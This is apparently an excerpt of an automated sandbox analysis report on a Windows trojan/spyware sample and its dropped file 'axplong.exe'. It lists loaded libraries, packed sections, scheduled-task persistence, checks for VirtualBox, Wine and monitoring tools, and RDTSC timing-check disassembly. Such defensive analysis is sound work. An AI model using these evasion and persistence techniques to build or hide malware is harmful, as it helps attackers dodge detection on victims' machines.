                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00BE4AF09_2_00BE4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C2765B9_2_00C2765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C22BD09_2_00C22BD0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C2777B9_2_00C2777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C26F099_2_00C26F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00C287209_2_00C28720
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe 1DBBF81D6F4B2222B37594E8FF30672BF85FD360F347CBD20B1A5D7B841DD276
                    Source: 9ICG2PuZbG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9ICG2PuZbG.exeStatic PE information: Section: ZLIB complexity 0.9967749489100818
                    Source: 9ICG2PuZbG.exeStatic PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
                    Source: axplong.exe.1.drStatic PE information: Section: ZLIB complexity 0.9967749489100818
                    Source: axplong.exe.1.drStatic PE information: Section: pcxsfzhs ZLIB complexity 0.9944540457842248
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 9ICG2PuZbG.exeVirustotal: Detection: 52%
                    Source: 9ICG2PuZbG.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeFile read: C:\Users\user\Desktop\9ICG2PuZbG.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\9ICG2PuZbG.exe "C:\Users\user\Desktop\9ICG2PuZbG.exe"
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: 9ICG2PuZbG.exeStatic file information: File size 1897984 > 1048576
                    Source: 9ICG2PuZbG.exeStatic PE information: Raw size of pcxsfzhs is bigger than: 0x100000 < 0x19da00

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeUnpacked PE file: 1.2.9ICG2PuZbG.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 9.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.1.drStatic PE information: real checksum: 0x1d101c should be: 0x1d2453
                    Source: 9ICG2PuZbG.exeStatic PE information: real checksum: 0x1d101c should be: 0x1d2453
                    Source: 9ICG2PuZbG.exeStatic PE information: section name:
                    Source: 9ICG2PuZbG.exeStatic PE information: section name: .idata
                    Source: 9ICG2PuZbG.exeStatic PE information: section name:
                    Source: 9ICG2PuZbG.exeStatic PE information: section name: pcxsfzhs
                    Source: 9ICG2PuZbG.exeStatic PE information: section name: plzfkdac
                    Source: 9ICG2PuZbG.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name: .idata
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name: pcxsfzhs
                    Source: axplong.exe.1.drStatic PE information: section name: plzfkdac
                    Source: axplong.exe.1.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 9_2_00BFD84C push ecx; ret 9_2_00BFD85F
                    Source: 9ICG2PuZbG.exeStatic PE information: section name: entropy: 7.977259343253602
                    Source: 9ICG2PuZbG.exeStatic PE information: section name: pcxsfzhs entropy: 7.95412617888117
                    Source: axplong.exe.1.drStatic PE information: section name: entropy: 7.977259343253602
                    Source: axplong.exe.1.drStatic PE information: section name: pcxsfzhs entropy: 7.95412617888117
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 33B3E1 second address: 33B3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 33B3E5 second address: 33B3F7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F3A9502B5ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 33B3F7 second address: 33B41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3A94CD4095h 0x0000000a jmp 00007F3A94CD4089h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 33B41C second address: 33B439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F3A9502B5ECh 0x0000000c jg 00007F3A9502B5E6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3476B7 second address: 3476D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A94CD4088h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 347B28 second address: 347B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A9502B5F4h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 347CC2 second address: 347CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 347CC6 second address: 347CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F4h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 347CE4 second address: 347CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 347E86 second address: 347EA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F3A9502B5E6h 0x00000009 jmp 00007F3A9502B5EEh 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 347EA2 second address: 347EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 347EA6 second address: 347EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F3A9502B5E8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3A9502B5F5h 0x0000001b jnc 00007F3A9502B5E6h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 347EEA second address: 347EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 34ABBF second address: 34ABCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3A9502B5E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 34ABCD second address: 34ABDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 34ABDE second address: 34ABFD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ecx 0x0000000e pushad 0x0000000f jmp 00007F3A9502B5EEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 34ABFD second address: 34AC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 34AC0D second address: 34AC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5F9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 34ADBF second address: 34ADC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 34AE17 second address: 34AED3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A9502B5F1h 0x00000008 jmp 00007F3A9502B5EBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007F3A9502B5F2h 0x00000017 push 00000000h 0x00000019 call 00007F3A9502B5EBh 0x0000001e sub ecx, dword ptr [ebp+122D2B52h] 0x00000024 pop ecx 0x00000025 push A3B43380h 0x0000002a jg 00007F3A9502B5F2h 0x00000030 add dword ptr [esp], 5C4BCD00h 0x00000037 push ecx 0x00000038 mov edx, esi 0x0000003a pop esi 0x0000003b push 00000003h 0x0000003d mov edx, dword ptr [ebp+122D2BB2h] 0x00000043 push 00000000h 0x00000045 movzx edx, cx 0x00000048 push 00000003h 0x0000004a call 00007F3A9502B5F0h 0x0000004f mov dword ptr [ebp+122D2EF0h], eax 0x00000055 pop ecx 0x00000056 call 00007F3A9502B5E9h 0x0000005b jmp 00007F3A9502B5F5h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F3A9502B5F5h 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 34AED3 second address: 34AF21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F3A94CD4076h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F3A94CD4089h 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 jg 00007F3A94CD4076h 0x0000001f popad 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 jmp 00007F3A94CD4083h 0x0000002b pop ebx 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 35BFDE second address: 35BFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F3A9502B5E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 331236 second address: 33123B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3692DA second address: 3692DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3692DE second address: 369301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3A94CD4084h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 369301 second address: 369322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F3A9502B600h 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 36976B second address: 36976F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 369B39 second address: 369B3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
